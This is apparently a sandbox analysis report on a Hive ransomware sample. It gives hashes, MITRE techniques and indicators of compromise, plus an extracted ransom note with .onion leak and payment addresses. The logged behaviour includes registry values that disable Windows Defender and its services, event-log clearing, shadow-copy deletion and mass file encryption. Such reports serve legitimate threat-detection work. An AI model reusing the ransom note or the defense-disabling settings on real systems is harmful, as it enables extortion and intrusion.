hive | c15f267a2f8728cda84ae89122d07f706a92e23154bbb4b99e07892ae94ce083

Analysis

max time kernel
57s
max time network
139s
platform
windows10-2004_x64
resource
win10v2004-20250217-en
resource tags

arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
submitted
12/03/2025, 01:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe
Size

2.6MB
MD5

78fb5aaf33ba7bc649c3896f0be1c94b
SHA1

7369fa3e614595cb02ca09b3c8472a7258d569e1
SHA256

c15f267a2f8728cda84ae89122d07f706a92e23154bbb4b99e07892ae94ce083
SHA512

dfa459ab1e493251de0f0f0beba0e709b68c8da41e8a36c945df39f209f15f220d2e1db87fb4ff666c61b11e5e2591912fdb08e2de87171e8cf8147d8d298c22
SSDEEP

24576:LSWJv2CcnkpG1pSh6WFCTfqX9XyLpwE0D3modZ7GE+rcrVoPETgDqhCi1EbGTkSm:L/uEXTdZT+6VfHc3qui0CwSZE701D1j

Score

10^/10

hive defense_evasion discovery evasion execution impact ransomware spyware stealer trojan

Malware Config

Extracted

Path

C:\Program Files\Common Files\DESIGNER\pK8K_HOW_TO_DECRYPT.txt

Family

hive

Ransom Note

Your network has been breached and all data were encrypted. Personal data, financial reports and important documents are ready to disclose. To decrypt all the data and to prevent exfiltrated files to be disclosed at http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/ you will need to purchase our decryption software. Please contact our sales department at: http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/ Login: ojxQoX78fsLX Password: rMaNEBFqXrCE9FKmLdwQ To get an access to .onion websites download and install Tor Browser at: https://www.torproject.org/ (Tor Browser is not related to us) Follow the guidelines below to avoid losing your data: - Do not modify, rename or delete *.key.pirxq files. Your data will be undecryptable. - Do not modify or rename encrypted files. You will lose them. - Do not report to the Police, FBI, etc. They don't care about your business. They simply won't allow you to pay. As a result you will lose everything. - Do not hire a recovery company. They can't decrypt without the key. They also don't care about your business. They believe that they are good negotiators, but it is not. They usually fail. So speak for yourself. - Do not reject to purchase. Exfiltrated files will be publicly disclosed.

URLs

http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/

http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/

Signatures

Disables service(s) 3 TTPs
defense_evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002
Hive
A ransomware written in Golang first seen in June 2021.
ransomware hive
Hive family
hive

Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	reg.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs

defense_evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe

Modifies security service 2 TTPs 1 IoCs

defense_evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe

Clears Windows event logs 1 TTPs 3 IoCs

defense_evasion ransomware

Clear Windows Event Logs

T1070.001

pid	Process
4916	wevtutil.exe
2284	wevtutil.exe
220	wevtutil.exe

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4932	powershell.exe
404	powershell.exe

Modifies Security services 2 TTPs 6 IoCs

Modifies the startup behavior of a security service.

defense_evasion

Modify Registry

T1112

Impair Defenses

T1562

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SecurityHealthService\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SecurityHealthService\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4"	reg.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Internet Explorer\es-ES\ieinstal.exe.mui.DfZpKge42ACg5dIZLG2tLGFDR-LeKkTU-oxvlMz10K7_aZBMroOyCmo0.pirxq	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-black\Weather_TileSmallSquare.scale-100.png	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageLargeTile.scale-150_contrast-white.png	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNoteNewNoteMedTile.scale-100.png	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\Assets\contrast-white\PeopleAppList.targetsize-40_altform-unplated.png	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Services.Store.Engagement_10.0.18101.0_x86__8wekyb3d8bbwe\resources.pri	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\themes\dark\sat_logo_2x.png.DfZpKge42ACg5dIZLG2tLGFDR-LeKkTU-oxvlMz10K7_SHqDUDIizKE0.pirxq	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Square44x44Logo.targetsize-72.png	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-36_altform-unplated_contrast-black.png	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_neutral_split.scale-100_8wekyb3d8bbwe\AppxSignature.p7x	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\de-de\ui-strings.js.DfZpKge42ACg5dIZLG2tLGFDR-LeKkTU-oxvlMz10K7_MspaERaoarU0.pirxq	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\lib\management-agent.jar.DfZpKge42ACg5dIZLG2tLGFDR-LeKkTU-oxvlMz10K7_LlzTKojneiA0.pirxq	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\Assets\contrast-white\PeopleAppList.targetsize-32_altform-lightunplated.png	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ru-ru\ui-strings.js.DfZpKge42ACg5dIZLG2tLGFDR-LeKkTU-oxvlMz10K7_Eko5ygvkn0Q0.pirxq	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe
File opened for modification	C:\Program Files (x86)\Common Files\System\msadc\es-ES\msaddsr.dll.mui.DfZpKge42ACg5dIZLG2tLGFDR-LeKkTU-oxvlMz10K7_r2on1bd5Zjw0.pirxq	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\lib\logging.properties.DfZpKge42ACg5dIZLG2tLGFDR-LeKkTU-oxvlMz10K7_fhnNHCmPMQE0.pirxq	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\convertpdf-tool-view.js.DfZpKge42ACg5dIZLG2tLGFDR-LeKkTU-oxvlMz10K7_z08lbSp4jNA0.pirxq	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_1.1911.21713.0_x64__8wekyb3d8bbwe\Assets\Store\StoreLogo.scale-150.png	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_neutral_split.scale-200_8wekyb3d8bbwe\AppxBlockMap.xml	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\Assets\contrast-white\PeopleAppList.targetsize-40.png	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_backarrow_default.svg.DfZpKge42ACg5dIZLG2tLGFDR-LeKkTU-oxvlMz10K7_8J7CSeXtXv00.pirxq	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\nl-nl\ui-strings.js.DfZpKge42ACg5dIZLG2tLGFDR-LeKkTU-oxvlMz10K7_MZ8LZ5F609w0.pirxq	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Integration\C2RManifest.officemuiset.msi.16.en-us.xml.DfZpKge42ACg5dIZLG2tLGFDR-LeKkTU-oxvlMz10K7_F0SOx42RAf40.pirxq	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PROOF\msgr8en.dub.DfZpKge42ACg5dIZLG2tLGFDR-LeKkTU-oxvlMz10K7_SyrZWrQQFTE0.pirxq	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Square150x150Logo.scale-100.png	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_2019.1111.2029.0_neutral_~_8wekyb3d8bbwe\AppxMetadata\AppxBundleManifest.xml	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\zh-cn\ui-strings.js.DfZpKge42ACg5dIZLG2tLGFDR-LeKkTU-oxvlMz10K7_dxCHj6yMWq80.pirxq	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Integration\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml.DfZpKge42ACg5dIZLG2tLGFDR-LeKkTU-oxvlMz10K7_k-DEbJhM_Ro0.pirxq	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\Fonts\private\DUBAI-LIGHT.TTF.DfZpKge42ACg5dIZLG2tLGFDR-LeKkTU-oxvlMz10K7_VDw9cXrW0rY0.pirxq	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe
File opened for modification	C:\Program Files\Windows Media Player\Network Sharing\wmpnss_color48.bmp	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\AppxBlockMap.xml	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailSplashLogo.scale-125.png	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\ended_review_or_form.gif.DfZpKge42ACg5dIZLG2tLGFDR-LeKkTU-oxvlMz10K7_Mtk3oJKeC7E0.pirxq	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlusVL_MAK-pl.xrm-ms.DfZpKge42ACg5dIZLG2tLGFDR-LeKkTU-oxvlMz10K7_lkxmVjxcv140.pirxq	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\meta\art\00_musicbrainz.luac.DfZpKge42ACg5dIZLG2tLGFDR-LeKkTU-oxvlMz10K7_wo-7V5lwZeE0.pirxq	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\TrafficHub\contrast-white\SmallTile.scale-125.png	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Services.Store.Engagement_10.0.18101.0_x86__8wekyb3d8bbwe\AppxSignature.p7x	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\es-es\ui-strings.js.DfZpKge42ACg5dIZLG2tLGFDR-LeKkTU-oxvlMz10K7_9Oy5Q2jZ0T80.pirxq	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe
File opened for modification	C:\Program Files\Java\jre-1.8\lib\security\java.policy.DfZpKge42ACg5dIZLG2tLGFDR-LeKkTU-oxvlMz10K7_rhhWokF33-80.pirxq	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Access2019R_Trial-ul-oob.xrm-ms.DfZpKge42ACg5dIZLG2tLGFDR-LeKkTU-oxvlMz10K7_uGtqHm_cvnE0.pirxq	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-64_altform-unplated_contrast-white.png	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Transit\contrast-black\WideTile.scale-200.png	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\winsdkfb\Images\fb_blank_profile_portrait.png	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxA-Exchange.scale-300.png	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdR_Retail-ppd.xrm-ms.DfZpKge42ACg5dIZLG2tLGFDR-LeKkTU-oxvlMz10K7_nMbzr8xxITM0.pirxq	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\Fonts\private\NIRMALA.TTF.DfZpKge42ACg5dIZLG2tLGFDR-LeKkTU-oxvlMz10K7_LGrU7AtKuPY0.pirxq	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxA-Advanced-Light.scale-200.png	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HomeBanner-2x.png.DfZpKge42ACg5dIZLG2tLGFDR-LeKkTU-oxvlMz10K7_qCCbdpsEjrU0.pirxq	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\plugin.js.DfZpKge42ACg5dIZLG2tLGFDR-LeKkTU-oxvlMz10K7_YTw_vl8gTgg0.pirxq	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteSectionWideTile.scale-200.png	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\sl-si\ui-strings.js.DfZpKge42ACg5dIZLG2tLGFDR-LeKkTU-oxvlMz10K7_1YL_h9oL6GU0.pirxq	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe
File opened for modification	C:\Program Files (x86)\Windows Media Player\it-IT\wmpnssci.dll.mui	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Assets\PhotosAppList.targetsize-20_altform-unplated.png	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxMailBadge.scale-200.png	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\end_review.gif.DfZpKge42ACg5dIZLG2tLGFDR-LeKkTU-oxvlMz10K7_PBFSwxWqINg0.pirxq	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_download_pdf_18.svg.DfZpKge42ACg5dIZLG2tLGFDR-LeKkTU-oxvlMz10K7_j4HRazehpZg0.pirxq	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe
File opened for modification	C:\Program Files (x86)\Windows Media Player\fr-FR\wmpnssci.dll.mui	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\Weather_TileMediumSquare.scale-100.png	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailAppList.scale-400.png	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pl_get.svg.DfZpKge42ACg5dIZLG2tLGFDR-LeKkTU-oxvlMz10K7_KK-eej2yQ600.pirxq	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlusVL_KMS_Client-ul-oob.xrm-ms.DfZpKge42ACg5dIZLG2tLGFDR-LeKkTU-oxvlMz10K7_KKdQLimqrVg0.pirxq	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioProMSDNR_Retail-ul-phn.xrm-ms.DfZpKge42ACg5dIZLG2tLGFDR-LeKkTU-oxvlMz10K7_T22UnAzsxWs0.pirxq	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\SpotlightCalendar_2017-03.gif	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\EmptyCalendarSearch.scale-400.png	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe

Launches sc.exe 8 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
548	sc.exe
2360	sc.exe
4048	sc.exe
2372	sc.exe
4332	sc.exe
4516	sc.exe
3784	sc.exe
2144	sc.exe

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wevtutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wevtutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wevtutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
